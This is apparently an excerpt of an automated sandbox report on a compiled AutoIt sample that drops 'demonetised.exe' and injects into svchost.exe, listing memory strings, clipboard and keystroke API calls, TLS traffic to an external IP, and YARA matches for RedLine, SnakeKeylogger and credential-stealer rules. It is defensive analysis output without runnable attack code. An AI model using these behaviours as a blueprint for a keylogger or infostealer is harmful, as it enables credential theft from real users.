                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.000000000534A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000521A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: svchost.exe, 00000006.00000002.4525232764.000000000534E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
                  Source: svchost.exe, 00000003.00000002.4524898032.000000000546D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/hZ
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005477000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E36B0C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E36D07
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D76D07
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E36B0C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E22B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E22B37
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4F7FF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF

                  System Summary

                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.demonetised.exe.3a90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.demonetised.exe.1290000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: This is a third-party compiled AutoIt script. 0_2_00DE3D19
                  Source: B7N48hmO78.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_9bae0d3b-b
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a54ca064-8
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: This is a third-party compiled AutoIt script. 2_2_00D23D19
                  Source: demonetised.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_84e33f3b-3
                  Source: demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f4f5c117-b
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_27c54d59-c
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5f7070d2-0
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DE3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00DE3742
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E500AF NtdllDialogWndProc_W,0_2_00E500AF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E50133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_00E50133
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E5044C NtdllDialogWndProc_W,0_2_00E5044C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4E9AF NtdllDialogWndProc_W,CallWindowProcW,0_2_00E4E9AF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFAAFC NtdllDialogWndProc_W,0_2_00DFAAFC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFAB4F NtdllDialogWndProc_W,0_2_00DFAB4F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00E4ECD4
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4EC7C NtdllDialogWndProc_W,0_2_00E4EC7C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00E4EEEB
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00E4F1D7
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFB11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,0_2_00DFB11F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F2D0 SendMessageW,NtdllDialogWndProc_W,0_2_00E4F2D0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFB385 GetParent,NtdllDialogWndProc_W,0_2_00DFB385
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00E4F351
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F5DA NtdllDialogWndProc_W,0_2_00E4F5DA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F5AB NtdllDialogWndProc_W,0_2_00E4F5AB
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00DFB55D
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F689 ClientToScreen,NtdllDialogWndProc_W,0_2_00E4F689
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F654 NtdllDialogWndProc_W,0_2_00E4F654
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F609 NtdllDialogWndProc_W,0_2_00E4F609
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4F7FF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E4F7C3 GetWindowLongW,NtdllDialogWndProc_W,0_2_00E4F7C3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFB715 NtdllDialogWndProc_W,0_2_00DFB715
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D23742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00D23742
